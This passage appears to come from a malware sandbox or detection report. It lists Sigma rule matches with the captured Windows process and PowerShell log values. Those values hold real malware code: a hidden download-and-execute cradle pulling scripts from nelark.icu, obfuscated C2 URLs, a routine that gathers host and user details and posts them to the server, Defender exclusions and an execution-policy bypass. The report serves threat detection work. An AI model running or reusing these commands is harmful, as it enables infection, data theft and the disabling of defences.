"rule_title": "Suspicious SYSTEM User Process Creation",
"rule_description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)",
"rule_author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e88280a32f81c8575c3cb9b02910d867498fbf28ca75ca922ad991faa3a68879",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Download and Execution Cradles",
"rule_description": "Detects PowerShell download and execution cradles.",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "124bf07ac70743e91b5698e3731aae0330fc182aa58036390f2a0457a90b5341",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Download - Powershell Script",
"rule_description": "Detects a suspicious PowerShell download command",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function instant \r\n{\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\",\"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\",\"\")\r\n\t\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro [TRUNCATED]",
"Path": "",
"ScriptBlockId": "b9074726-f447-4eeb-ae01-f320d07e4e96",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "49b185e25e68c30cebd01a44e72bda0c359c132bb364ef487a935de293813a78",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Execution Policy Tampering",
"rule_description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"EventID": "13",
"EventType": "SetValue",
"Details": "Bypass",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5572c8188426269a10ccb41fc8e9c8445391ac38a0917621b0a1ee05ec99aac9",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level - PowerShell",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\t#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tinstant\r\n\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\twhile ($null -eq $sysProc) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "f12e231f-9aac-412a-be32-b4b73178ce41",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nfunction newDir($path) {\r\n\tif ((Test-Path $path) -eq $false ) {\r\n\t\tNew-Item -ItemType Directory -Path $path\r\n\t}\r\n}\r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.log\"\r\n\t\tif (Test-Path $local) [TRUNCATED]",
"Path": "",
"ScriptBlockId": "b1b561d6-f30f-4c48-b9d7-b59f4e127079",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\tSet-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tAdd-MpPreference -ExclusionPath \"$env:windir\\System32\"\r\n\t$exist = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\tif ($exist.Count -gt 1) {\r\n\t\treturn\r\n\t}\r\n\twhile ($true) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "09998871-6404-48e7-98ea-8b74ad96fcf6",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "0aa6d143-3ab3-4a7f-9b19-fa0dc39031ea",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "56b8c79acb8e444c2b00be5c9d3cb8e33e863ccb3506d635f907a49cd053c84f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Startup Folder File Write",
"rule_description": "A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.",
"rule_author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
"match_context": [
{
"values": {
"TargetFilename": "%APPDATA%\\microsoft\\windows\\start menu\\programs\\startup\\onedrive.lnk"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5b5656801277c44d48ce3c9f4c8c393d55f8c0943d2c641d4968a012bd160f38",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Timestomp",
"rule_description": "Adversaries may modify file time attributes to hide new files or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden.\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "19bddaf3-24cc-4726-82f3-63e6d7e62964",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n\t$request.GetResponse();\r\n}",
"Path": "",
"ScriptBlockId": "990d9297-f5a7-4487-9387-e827df4df12a",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"Path": "",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sif() {\r\n\t$fph = $env:windir + \"\\Temp\" +$fhrmvkdlf\r\n\tNew-Item -Path $fph -Type directory -Force\r\n\t$hFLgPth = $fph + $lognmfl\r\n\tgif $hFLgPth\r\n\t$hexdata =[IO.File]::readalltext($hFLgPth)\r\n\t$bytes = [System.Text.Encoding]::UTF8.GetBytes($hexdata)\r\n\t$b64 = [System.Convert]::ToBase64String($bytes)\r\n\t$udivkv = $mainUri + \"res/index.php\"\r\n\t$uid = gid\r\n\t# Invoke-WebRequest -Uri $udivkv -Method Post -Body \"uid=$uid&result=$b64\"\r\n\tpostRequest $udivkv \"uid=$uid&result=$b64\"\r\n\tRemove-Item -path $hF [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4e7b0706-2a37-4037-af3a-b75aa5b5fb33",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "cf863dff3d564c975d28d336cb7981fcd6956e6fb9afbd2794f600b130e83171",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Windows Defender Exclusions Added - PowerShell",
"rule_description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions",
"rule_author": "Tim Rauch, Elastic (idea)",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
